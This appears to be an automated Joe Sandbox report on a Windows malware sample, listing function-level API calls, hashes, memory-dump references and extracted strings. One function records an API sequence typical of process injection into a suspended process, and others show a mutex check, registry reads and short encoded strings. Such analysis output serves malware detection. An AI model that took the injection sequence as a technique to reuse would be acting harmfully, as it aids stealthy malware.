Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 2155170405-239921721
Opcode ID: 3ec7b4fc7c66cc1f0edcd82b057874fa8d33e69cd29102c619455581c6d3134a
Instruction ID: 0b1857cd00b3e1709cd872e942ee69e4723c7315f89fed6d668b7ee4953dda47
Opcode Fuzzy Hash: 3ec7b4fc7c66cc1f0edcd82b057874fa8d33e69cd29102c619455581c6d3134a
Instruction Fuzzy Hash: 4A51FA71900364BBCB10EF66DC5699EBB78EF40390B10415AF515E73A1EB309E45EBA0

Function 00CB9A20 Relevance: 7.7, APIs: 5, Instructions: 155
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,?,79C85444,00000000), ref: 00CB9A99
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9B00
GetProcAddress.KERNEL32(00000000), ref: 00CB9B07
GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9BC4

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: f66b737d88ae13fe521e7bf0f0946e24826b98744d46e4bf36597274f87d5312
Instruction ID: 5ca82b7766dddb3a87bf695f00284c83332801b56c049078dcdfe323ff8f8f5e
Opcode Fuzzy Hash: f66b737d88ae13fe521e7bf0f0946e24826b98744d46e4bf36597274f87d5312
Instruction Fuzzy Hash: E0514771D042089BDB24EF68DD497DDBB74EB45310F5042A9E918A73D1EB348EC0CBA1

Function 00CE065C Relevance: 7.6, APIs: 5, Instructions: 141
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CE058E), ref: 00CE067E
GetFileInformationByHandle.KERNEL32(?,?), ref: 00CE06D8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00CE058E,?,000000FF,00000000,00000000), ref: 00CE0766
__dosmaperr.LIBCMT ref: 00CE076D
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00CE07AA

Part of subcall function 00CE09D2: __dosmaperr.LIBCMT ref: 00CE0A07

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: ce6ab100770082e83d6110260dc1091205e8c40689f289e538fec044c7c33922
Instruction ID: ce3d05025ede571da2a616c7c29be63b648e20ef4fb0a344935f48b437f4c747
Opcode Fuzzy Hash: ce6ab100770082e83d6110260dc1091205e8c40689f289e538fec044c7c33922
Instruction Fuzzy Hash: 46414C75900384ABDB24DFB6DC459ABBBF9EF88700B244419F556D3211E770A980DFA0

Function 00CBC6D0 Relevance: 6.0, APIs: 4, Instructions: 36
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000096), ref: 00CBC6D6
CreateMutexA.KERNEL32(00000000,00000000,00D17494), ref: 00CBC6F4
GetLastError.KERNEL32 ref: 00CBC6FC
GetLastError.KERNEL32 ref: 00CBC70D

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID:
API String ID: 3645482037-0
Opcode ID: 7bedd34aadae0f9185d9a5bfa1e5766a927bf1853ea5e762ca7a299b18270e7a
Instruction ID: d9db7d9cdea9cae3bed1824a5d7614cf16097cf0663c41f11fcf83b22bfa73fb
Opcode Fuzzy Hash: 7bedd34aadae0f9185d9a5bfa1e5766a927bf1853ea5e762ca7a299b18270e7a
Instruction Fuzzy Hash: 18E04834648340EBE7101B68ED8D79E3627D794711F504464F65ED63A1CF6048C08A31

Function 00CEEBD9 Relevance: 4.6, APIs: 3, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00CEECA9

Part of subcall function 00CEEA7F: _free.LIBCMT ref: 00CEEADF
Part of subcall function 00CEEA7F: GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00CEECA0,?,?,00000000), ref: 00CEEAF1

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 37325fe2835f1a86fcc05d47f2539c8b47c20101872fa9e0ffcb87eac4c7bc42
Instruction ID: cd80de015381ba0ca62009d97e94185b1597d77133ba02ae9200e20e67f73769
Opcode Fuzzy Hash: 37325fe2835f1a86fcc05d47f2539c8b47c20101872fa9e0ffcb87eac4c7bc42
Instruction Fuzzy Hash: AB21FC7280039966C730AB779D459EB77B8DF403E4F304259E579E3282EE30DE46A660

Function 00CE04F4 Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e8feaab3b39119be1cb6aed4a9e0885825a63e97eea60cbae642ce005ebf94
Instruction ID: 6711f35a231ae04858656c0b9c8b9bbd14c7479036e2cbde824bbf0eaa94050d
Opcode Fuzzy Hash: 48e8feaab3b39119be1cb6aed4a9e0885825a63e97eea60cbae642ce005ebf94
Instruction Fuzzy Hash: 9A210A31801248BBEB11BB659C42F9E37299F41374F350315F9347B2D1D7B05F45AAA5

Function 00CE07CC Relevance: 3.1, APIs: 2, Instructions: 54
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00CE0703,?,?,00000000,00000000), ref: 00CE07FA
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00CE0703,?,?,00000000,00000000), ref: 00CE080E

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 4c19be0c439f4b96adda6bc3a8a47f97127603aca7718b407cef037c6bcbf6c3
Instruction ID: 39e7ac816816b9983956c9e209edbbc1eb9b92004e35eb49d5e44959c9d26c3b
Opcode Fuzzy Hash: 4c19be0c439f4b96adda6bc3a8a47f97127603aca7718b407cef037c6bcbf6c3
Instruction Fuzzy Hash: 1311FE7690024CABDB14DF95C945ADF77BCAF18310F604266E626E2181EB70EB85CBB1

Function 00CD0C00 Relevance: 3.0, APIs: 2, Instructions: 23
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CBC6D0: Sleep.KERNEL32(00000096), ref: 00CBC6D6
Part of subcall function 00CBC6D0: CreateMutexA.KERNEL32(00000000,00000000,00D17494), ref: 00CBC6F4
Part of subcall function 00CBC6D0: GetLastError.KERNEL32 ref: 00CBC6FC
Part of subcall function 00CBC6D0: GetLastError.KERNEL32 ref: 00CBC70D

Part of subcall function 00CCF300: RegOpenKeyExA.KERNEL32(80000002,System,00000000,000F003F,?,00000000), ref: 00CCF3E2
Part of subcall function 00CCF300: RegCloseKey.KERNEL32(80000002), ref: 00CCF3F8

Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,00000000), ref: 00CB67BD
Part of subcall function 00CB61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00CB6894

CreateThread.KERNEL32(00000000,00000000,Function_00020B40,00000000,00000000,00000000), ref: 00CD0BE0
Sleep.KERNEL32(00007530), ref: 00CD0BF5

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CreateErrorLastOpenSleep$CloseInfoMutexQueryThread
String ID:
API String ID: 2150463253-0
Opcode ID: 35ff3c7ad83db74f6a77bfe74d41ce7787c36e50b3daf00ba27b6ca87b4a0f47
Instruction ID: a73e4a4c269233ecd305cf3df5260cc4efd62defaa456f73e8b5eda9ae873ed8
Opcode Fuzzy Hash: 35ff3c7ad83db74f6a77bfe74d41ce7787c36e50b3daf00ba27b6ca87b4a0f47
Instruction Fuzzy Hash: F3E08C346D8704B7E22037A69C0BF9D76055B01B56F28021AFB8D6A2E35DD4B14065BB

Function 00CBB250 Relevance: 1.7, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000002,?,?,79C85444,75920F00), ref: 00CBB2A6

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 3cdac5d20c56faa2fb40404ba67f51e9dec82753f821d00afe26280bef339c41
Instruction ID: aa7d6d6d16603ca956a867cad3aa4486a2e2081657e5df6769ddde59442a81eb
Opcode Fuzzy Hash: 3cdac5d20c56faa2fb40404ba67f51e9dec82753f821d00afe26280bef339c41
Instruction Fuzzy Hash: EC515D719012299BCB20DF68DC88BDDB7B8FB58310F5006DAD819A7691DB74AE84CF91

Function 00CE0482 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CE04E9

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
Instruction ID: 985a8208129b15968623fd392b54145f8332afbf40e984411a14c8cc81f30497
Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
Instruction Fuzzy Hash: 40016772C04259BEDF51AFA9DD0279D7FF4AB04314F248166FA28F61D1EAB08A84D7D0

Function 00CD0B40 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB61F0: RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,79C85444,79C85444), ref: 00CB639C
Part of subcall function 00CB61F0: RegQueryValueExA.KERNEL32(79C85444,?,00000000,00000000,?,00000400,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63CA
Part of subcall function 00CB61F0: RegCloseKey.KERNEL32(79C85444,?,?,00000000,00000001,79C85444,79C85444), ref: 00CB63D6

Sleep.KERNEL32 ref: 00CD0BC5

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: ac0ae369eb4bf07b700501299b3d819e18594a8fdfce3d47caf4da27fca96a62
Instruction ID: 7b55eb54e3eb4bf2a47c4cd3aa5f08d214f93447407300e7207e450614b98375
Opcode Fuzzy Hash: ac0ae369eb4bf07b700501299b3d819e18594a8fdfce3d47caf4da27fca96a62
Instruction Fuzzy Hash: 48F0FF35A00204BBCB00BB6CDD07B9E7BB8AB02B20F500359E821A73D2DB305A0497E3

Non-executed Functions

Function 00CD923D Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CD9243
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CD9251
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CD9262
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CD9273
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CD9284
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CD9295
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00CD92A6
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00CD92B7
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00CD92C8
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CD92D9
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CD92EA
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CD92FB
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CD930C
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CD931D
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CD932E
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CD933F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CD9350
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00CD9361
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00CD9372
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00CD9383
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00CD9394
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00CD93A5
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00CD93B6
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00CD93C7
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00CD93D8
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CD93E9
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00CD93FA
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00CD940B
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CD941C
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CD942D
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00CD943E
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CD944F
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00CD9460
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CD9471
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00CD9482
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00CD9493
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00CD94A4
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00CD94B5
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00CD94C6
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00CD94D7
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00CD94E8

Strings

SetThreadpoolWait, xrefs: 00CD9334
GetLocaleInfoEx, xrefs: 00CD94CC
TryAcquireSRWLockExclusive, xrefs: 00CD9455
CompareStringEx, xrefs: 00CD94BB
FlsSetValue, xrefs: 00CD9279
CloseThreadpoolTimer, xrefs: 00CD9312
GetCurrentProcessorNumber, xrefs: 00CD9378
InitializeConditionVariable, xrefs: 00CD93EF
SetFileInformationByHandle, xrefs: 00CD93CD
kernel32.dll, xrefs: 00CD923E
CreateSemaphoreW, xrefs: 00CD92BD
LCMapStringEx, xrefs: 00CD94DD
CloseThreadpoolWait, xrefs: 00CD9345
CreateThreadpoolWait, xrefs: 00CD9323
SleepConditionVariableSRW, xrefs: 00CD9477
FreeLibraryWhenCallbackReturns, xrefs: 00CD9367
CreateEventExW, xrefs: 00CD92AC
InitializeSRWLock, xrefs: 00CD9433
WaitForThreadpoolTimerCallbacks, xrefs: 00CD9301
GetTickCount64, xrefs: 00CD93AB
SubmitThreadpoolWork, xrefs: 00CD9499
InitializeCriticalSectionEx, xrefs: 00CD928A
CreateThreadpoolTimer, xrefs: 00CD92DF
CreateSemaphoreExW, xrefs: 00CD92CE
FlsFree, xrefs: 00CD9257
ReleaseSRWLockExclusive, xrefs: 00CD9466
FlsAlloc, xrefs: 00CD924B
AcquireSRWLockExclusive, xrefs: 00CD9444
FlsGetValue, xrefs: 00CD9268
CloseThreadpoolWork, xrefs: 00CD94AA
GetCurrentPackageId, xrefs: 00CD939A
InitOnceExecuteOnce, xrefs: 00CD929B
GetFileInformationByHandleEx, xrefs: 00CD93BC
SleepConditionVariableCS, xrefs: 00CD9422
WakeAllConditionVariable, xrefs: 00CD9411
SetThreadpoolTimer, xrefs: 00CD92F0
GetSystemTimePreciseAsFileTime, xrefs: 00CD93DE
WakeConditionVariable, xrefs: 00CD9400
CreateSymbolicLinkW, xrefs: 00CD938E
CreateThreadpoolWork, xrefs: 00CD9488
FlushProcessWriteBuffers, xrefs: 00CD9356

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 921c72e52c7ec2c07897391235894e3582b320a73f66bde2f950d253cdc7d60b
Instruction ID: 91b0b11209a51e003f2012b4a320042519dd2592e9d2f1a74943d99cce5cf51d
Opcode Fuzzy Hash: 921c72e52c7ec2c07897391235894e3582b320a73f66bde2f950d253cdc7d60b
Instruction Fuzzy Hash: 4F61A975956360BFCB009FB4AC4DBA63EA8FB1A741314841AF189D23A4DFF640899F74

Function 00CCC4F0 Relevance: 25.0, APIs: 8, Strings: 6, Instructions: 530COMMON

Download Yara Rule

Strings

246122658369, xrefs: 00CC83D7, 00CCC559, 00CCC9D0, 00CCCA31
3Iy=, xrefs: 00CCCA17
eMLY5DB0Qy =, xrefs: 00CCC63D
3Yy=, xrefs: 00CCC9B6
3YG=, xrefs: 00CC83BA, 00CCC53F
eMLY5zdpQw==, xrefs: 00CCC598, 00CCC801

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID: 246122658369$3Iy=$3YG=$3Yy=$eMLY5DB0Qy =$eMLY5zdpQw==
API String ID: 0-1672437353
Opcode ID: 962e7c637f34f9bbe04225d631a0a9fb4102ce8244c819a63c374f8b65eb906d
Instruction ID: bfb96f2832acc36054790b072bfac0b1c12b13045acb0a2ada548cb3b72bd0ee
Opcode Fuzzy Hash: 962e7c637f34f9bbe04225d631a0a9fb4102ce8244c819a63c374f8b65eb906d
Instruction Fuzzy Hash: 05120571A002489BEF08EFA8CD8ABDDBB75EF45300F50414DE419A73C2D7759A85DBA2

Function 00CB8070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CB809D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00CB80FB
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00CB8114
GetThreadContext.KERNEL32(?,00000000), ref: 00CB8129
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00CB8149
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00CB818B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00CB81A8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CB8261

Strings

, xrefs: 00CB8140
VUUU, xrefs: 00CB7F01
invalid stoi argument, xrefs: 00CB8057

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

